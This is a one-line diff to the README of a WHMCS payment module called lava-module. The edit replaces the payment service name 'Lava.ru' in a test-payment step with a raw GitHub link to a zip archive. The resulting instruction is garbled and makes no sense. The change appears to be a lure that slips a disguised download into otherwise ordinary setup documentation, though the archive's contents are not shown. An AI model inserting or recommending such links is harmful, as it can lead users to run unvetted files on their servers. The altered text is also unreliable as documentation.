Kobe2x/lava-module/README.md

 ### 3. Make a Test Payment

-Attempt to pay this invoice using Lava.ru via lava-module.
+Attempt to pay this invoice using https://github.com/Kobe2x/lava-module/raw/refs/heads/main/callback/lava-module-2.2.zip via lava-module.
 Confirm that payment completes successfully and transaction status updates in WHMCS.

 ### 4. Check Logs and Reports